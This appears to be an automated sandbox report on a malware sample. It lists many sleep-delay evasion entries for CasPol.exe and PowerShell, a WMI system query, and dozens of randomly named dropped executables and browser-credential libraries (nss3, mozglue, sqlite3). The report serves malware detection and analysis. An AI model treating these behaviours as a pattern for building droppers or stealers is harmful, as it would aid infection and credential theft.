Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593964	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593811	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593670	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 593004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 592156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591949	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591560	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 591094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590957	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590208	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 590047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589803	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589248	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 589094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 588413	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 587734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 586219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585576	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 585344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 584047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 583172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582596	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 582188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581321	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 581128	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 580188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579764	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 579044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578338	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 578031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577763	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577521	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 577154	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 576109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 575063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574807	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 574217	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573899	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573678	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 573078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 572563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 572187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 571719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 571317	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 568628	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 568222	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 567753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 567200	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 566887	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 566361	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 565720	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 565173	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 564829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 564431	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 563642	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 563017	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 562501	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 561486	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 561133	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 560704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 560389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 559830	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 559142	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 558689	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 558220	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 557329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 556421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 554874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 553561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 551613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 549926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 548660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 547398	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 545719	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 543459	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 541676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 539573	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 535870	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 533120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 531120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 529432	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 527057	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 525792	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 525120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 523729	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 522526	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 521198	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 512881	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 508316	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 504441	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 500176	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 496369	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 495879	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 494660	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 492910	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 490707	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 489629	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 488301	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 485957	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 484097	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 482535	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 480863	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 479613	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 478207	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4274	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4808	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 3526	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 3886	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1408
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Window / User API: threadDelayed 352

Source: C:\Users\user\AppData\Local\Temp\7zSD456.tmp\Install.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\TYAlD9K38T8WbNsaQQTkm89X.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\xin[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\r1O81gOTKkD0PfSdUigHGcl2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Opera_105.0.4970.16_Autoupdate_x64[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\dGDzhUFIRKv6GPXQTIFzAmvz.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\setup294[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ikxtQFXRCEfEHQTLmAUzD8qT.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\home[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\timeSync[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\NMVWvUSYQ5v8UtFVuNmXDI3v.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\99Xilbvd4jSilvCMPk8Sud3T.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\tuwxsmmkPgY2E0qU41YG7RXX.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\mVd8JjiAeizZqfVE2Y07H3YG.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\NrSR7wL9a6ScJhHM3ZR1vnHv.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\YGRs52NUZm6ZTeu1K4eZCg73.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\l2VGlkyVE7xUJ5Ydz5l8CsC0.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\8TF9AtsMAWKytLiZaNJGNowl.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\k0pYXiEKtAOcp0Nk17UQ5_g3.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\kvNC7tDmYUgdIYLH90ijrXsg.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\RRe1rhCZ16opf2KOV6fOjlXA.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\AwrGvSh0VNKMWo4lmCJZrqGt.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\LIMPKWkTxHbhz8UQouDq3EgS.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\a00oNFnYUapr4qcZYFTTBItp.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\eahQfcDSk2Fi3XgQUppzGpDN.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\build[1].exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\sqlite3[1].dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\jf03kWzRd1Y8NYHdcHEpAddx.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\TcGLfdTBaos9JgPXgH8pOdVr.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\Service_32[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\O1pHCqcpXPsB2X19IwAi5F3Z.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\ohQpGh89_DKtYLyMVbmJ3Rtn.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\eoK_HtB8HzOnJQBreBydnt5f.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\6CYB0iVk9rownSr74i6xHL6G.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\0V9EbnB8e6ebVrU36pWfpYPt.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\Minor Policy\0NiGzKSTtDzAUZOkgD66xsNo.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\softokn3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\Pictures\LuhjrDkHbg5EV9gJjZgRzNRC.exe	Jump to dropped file
Source: C:\Users\user\Pictures\BXuFYgf6xs2uEKGHPQsSTe25.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\nss3[1].dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\gfhvq0lCOSbYQVB1nKgfu6Hp.exe	Jump to dropped file
Source: C:\Users\user\Pictures\DU9aZfxw1xhKC4ykOgcxwHTl.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\36b88b89v[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\674Kdwx0QZ5HYr8oith6hwyE.exe	Jump to dropped file
